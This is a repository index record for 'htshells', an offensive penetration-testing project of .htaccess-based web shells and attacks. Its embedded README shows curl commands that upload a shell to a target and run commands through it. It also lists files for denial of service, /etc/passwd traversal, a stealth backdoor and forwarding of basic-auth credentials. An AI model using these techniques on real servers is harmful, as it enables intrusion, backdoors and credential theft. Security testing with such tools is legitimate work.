{"id":13537640,"url":"https://github.com/wireghoul/htshells","last_synced_at":"2025-05-16T18:10:07.996Z","repository":{"id":37396786,"uuid":"1753398","full_name":"wireghoul/htshells","owner":"wireghoul","description":"Self contained htaccess shells and attacks","archived":false,"fork":false,"pushed_at":"2022-02-17T00:26:23.000Z","size":59,"stargazers_count":1047,"open_issues_count":1,"forks_count":192,"subscribers_count":36,"default_branch":"master","last_synced_at":"2025-04-12T17:46:26.099Z","etag":null,"topics":["apache","exploit","htaccess","penetration-testing","polyglot","security","webshell"],"latest_commit_sha":null,"homepage":"http://www.justanotherhacker.com/projects.html","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/wireghoul.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":"wireghoul"}},"created_at":"2011-05-16T02:21:59.000Z","updated_at":"2025-04-10T16:36:41.000Z","dependencies_parsed_at":"2022-07-20T12:02:43.044Z","dependency_job_id":null,"html_url":"https://github.com/wireghoul/htshells","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wireghoul%2Fhtshells","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wireghoul%2Fhtshells/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wireghoul%2Fhtshells/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wireghoul%2Fhtshells/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/wireghoul","download_url":"https://codeload.github.com/wireghoul/htshells/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254582907,"owners_count":22095518,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apache","exploit","htaccess","penetration-testing","polyglot","security","webshell"],"created_at":"2024-08-01T09:01:01.485Z","updated_at":"2025-05-16T18:10:07.974Z","avatar_url":"https://github.com/wireghoul.png","language":"Shell","funding_links":["https://github.com/sponsors/wireghoul"],"categories":["\u003ca id=\"9eee96404f868f372a6cbc6769ccb7f8\"\u003e\u003c/a\u003e新添加的","Shell (473)","Shell","\u003ca id=\"faa91844951d2c29b7b571c6e8a3eb54\"\u003e\u003c/a\u003e新添加"],"sub_categories":["\u003ca id=\"31185b925d5152c7469b963809ceb22d\"\u003e\u003c/a\u003e新添加的"],"readme":"HTSHELLS - Self contained web shells and other attacks via .htaccess files.\n\nAttacks are named in the following fashion, module.attack.htaccess and grouped\nby attack type in directories. Pick the one you need and copy it to a new file\nnamed .htaccess, check the file to see if it needs editing before you upload it.\nWeb shells executes commands from the query parameter c, unless the file states\notherwise.\n\nTo prepare run `./prepare.sh file` which will generate the .htaccess file\nto be uploaded. Example:\n```\n$ ./prepare.sh shell/mod_php.shell.htaccess\n┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬  ┬  ┌─┐\n├─┤ │ └─┐├─┤├┤ │  │  └─┐\n┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘\n justanotherhacker.com\n\n.htaccess file is ready\n$ curl -F 'file=@.htaccess' -k https://target/upload.php\n$ curl -k https://target/uploads/.htaccess?c=id\n...\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n== DOS/       # Denial of service attacks\n- apache.dos.htaccess\n  Makes all requests return a 500 internal server error\n\n- mod_rewrite.dos.htaccess\n  Regular expression dos condition in mod_rewrite consumes a child process\n\n== INFO/      # Information disclosure attacks\n- modcheck/\n  Include additional response headers to indicate which Apache modules are active\n  \n- mod_caucho.info.htaccess *untested*\n  Server status binding for the mod_caucho Resin java server module\n\n- mod_clamav.info.htaccess\n  Clamav status page binding\n\n- mod_info.info.htaccess\n  Server info binding for Apache\n\n- mod_ldap.info.htaccess *untested*\n  Server status binding for the mod_ldap server module\n\n- mod_perl.info.htaccess\n  Display the mod_perl status page\n\n- mod_php.info.htaccess\n  Make all php pages show source instead of executing\n\n- mod_status.info.htacces\n  Server status binding for Apache\n\n\n== SHELL/       # Interactive command execution\n- mod_caucho.shell.htaccess *untested*\n  JSP based web shell\n\n- mod_cgi.shell.bash.htaccess\n  Shell using bash under the cgi handler, Requires exec flag to be set on the htaccess file.\n\n- mod_cgi.shell.windows.htaccess *untested*\n  Gives shell through php.exe via apache cgi configuration directives\n\n- mod_include.shell.htaccess\n  Server Side Include based web shell\n\n- mod_multi.shell.htaccess\n  Multiple shells in one .htaccess file, one attack fits all approach\n\n- mod_perl.shell.htaccess *incomplete*\n  TODO\n\n- mod_php.shell.htaccess\n  PHP based web shell access via http://domain/path/.htaccess?c=command\n\n- mod_php.shell2.htaccess\n  Alternate method of invoking a php shell from .htaccess file\n\n- mod_php.stealth.shell.htaccess\n  PHP based stealth backdoor - see http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html for tutorial\n\n- mod_python.shell.htaccess\n\n- mod_ruby.shell.htaccess\n\n- mod_suphp.shell.htaccess\n\n== TRAVERSAL/   # Directory traversal attacks\n- mod_hitlog.traversal.htaccess\n  Directory traversal attack via hitlog module tries to read /etc/passwd\n\n- mod_layout.traversal.htaccess\n  Directory traversal attack reads /etc/passwd\n\n\n== ./           # Various attacks\n- mod_auth_remote.phish.htaccess *untested*\n  Forward basic auth credentials to server of your choice\n\n- mod_badge.admin.htaccess\n  mod_badge admin page binding\n\n- mod_sendmail.rce.htaccess *untested*\n  Executes commands configured in the .htaccess file by specifying path and arguments to \"sendmail\" binary\n\nWireghoul - http://www.justanotherhacker.com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwireghoul%2Fhtshells","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwireghoul%2Fhtshells","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwireghoul%2Fhtshells/lists"}